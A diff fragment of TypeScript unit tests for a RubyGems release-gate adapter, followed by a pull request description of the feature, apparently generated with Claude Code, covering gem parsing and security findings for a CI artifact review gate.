+    expect((candidates[0].pipelineInput.artifacts as unknown[]).length).toBe(2);
+  });
+
+  test("distinct gem names fan out into separate candidates", () => {
+    const candidates = rubygemsWorkflowGateAdapter.prepareReleaseCandidates([
+      parsedGem("a-1.0.0.gem", { name: "a", version: "1.0.0" }),
+      parsedGem("b-2.0.0.gem", { name: "b", version: "2.0.0" }),
+    ]);
+    expect(candidates.map((c) => c.package.name).sort()).toEqual(["a", "b"]);
+  });
+
+  test("rejects a metadata-less gem", () => {
+    expect.assertions(2);
+    try {
+      rubygemsWorkflowGateAdapter.prepareReleaseCandidates([parsedGem("bare-1.0.0.gem", null)]);
+    } catch (err) {
+      expect(err).toBeInstanceOf(WorkflowArtifactError);
+      expect((err as WorkflowArtifactError).code).toBe("artifact_identity_missing");
+    }
+  });
+
+  test("rejects same-name gems that disagree on version", () => {
+    expect.assertions(1);
+    try {
+      rubygemsWorkflowGateAdapter.prepareReleaseCandidates([
+        parsedGem("dup-1.0.0.gem", { name: "dup", version: "1.0.0" }),
+        parsedGem("dup-1.1.0.gem", { name: "dup", version: "1.1.0" }),
+      ]);
+    } catch (err) {
+      expect((err as WorkflowArtifactError).code).toBe("artifact_identity_inconsistent");
+    }
+  });
+
+  test("rejects two gems that claim the same name and platform", () => {
+    expect.assertions(1);
+    try {
+      rubygemsWorkflowGateAdapter.prepareReleaseCandidates([
+        parsedGem("dup-1.0.0.gem", { name: "dup", version: "1.0.0", platform: "ruby" }),
+        parsedGem("dup-1.0.0-copy.gem", { name: "dup", version: "1.0.0", platform: "ruby" }),
+      ]);
+    } catch (err) {
+      expect((err as WorkflowArtifactError).code).toBe("artifact_identity_inconsistent");
+    }
+  });
+});


### PR DESCRIPTION
Closes #200. Adds RubyGems as a third GitHub Actions workflow-gate ecosystem alongside npm and PyPI, so CI builds `.gem` candidates, Drydock reviews the exact artifact bytes, and a deployment-protection rule holds the gem push until approval — reusing the existing ecosystem-neutral gate machinery (no changes to the job/webhook/decision code).

The one genuinely new primitive is a credentials-free `gem` sandbox format that parses the `.gem` container (an uncompressed outer tar wrapping a gzipped `data.tar.gz` of files plus a gzipped `metadata.gz` gemspec) through the same hardened `readTar`, bounded against gzip bombs. On top of that sits a rubygems package adapter (a defensive gemspec-YAML reader, deterministic findings for metadata mismatch/missing, native extensions, install-time extension build hooks, and unexpected push hosts, plus a best-effort rubygems.org baseline), a `WorkflowGateAdapter` that classifies `.gem` by path, a Ruby code-capability pattern set for the shared scanner, and registry/config wiring.

Docs land in `docs/rubygems-workflow-gate.md` (workflow YAML, nested-archive parsing, reviewed-bytes guarantee, acceptance mapping), and tests cover gem parsing/limits, the gemspec parser, adapter review/findings/baseline degradation, a 6-case security corpus, gate-adapter grouping, and the end-to-end prepare path. `pnpm run verify` (lint, format, typecheck, 877 tests) passes.

🤖 Generated with [Claude Code](https://claude.com/claude-code)